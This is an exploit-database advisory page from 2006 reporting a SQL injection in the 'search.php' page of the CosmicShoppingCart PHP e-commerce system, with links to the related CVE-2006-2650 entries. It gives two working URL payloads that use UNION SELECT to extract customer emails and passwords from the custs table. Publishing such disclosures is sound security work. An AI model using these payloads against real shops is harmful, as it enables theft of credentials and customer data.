Lucene search
VympelEDB-ID:1847HistoryMay 28, 2006 - 12:00 a.m.
CosmicShoppingCart - 'search.php' SQL Injection
2006-05-2800:00:00
Vympel
www.exploit-db.com
30
AI Score
7.4
Confidence
Low
Software: CosmicShoppingCart (www.cosmicphp.com)
Risk: Medium
Discovered by: Vympel (Marcelo Almeida)
Background: CosmicShoppingCart is a PHP / MySQL e-commerce system. It is a fully customizable, shopping cart designed.
SQL injections have been found, they could be exploited by users to retrieve the passwords of the admin.
Examples:
cosmicshop/search.php?max=-1%20UNION%20SELECT%201,1,1,cust_password,1,1,1,1,1%20FROM%20custs/*
cosmicshop/search.php?max='2'%20UNION%20SELECT%20'a','a','a',cust_email,cust_password,'abc',1,'a','a'%20FROM%20custs--
# milw0rm.com [2006-05-28]Related
cvelist
cvelist
CVE-2006-2650
2006-05-30 10:00:00
nvd
nvd
CVE-2006-2650
2006-05-30 10:02:00
cve
cve
CVE-2006-2650
2006-05-30 10:02:00
prion
prion
Sql injection
2006-05-30 10:02:00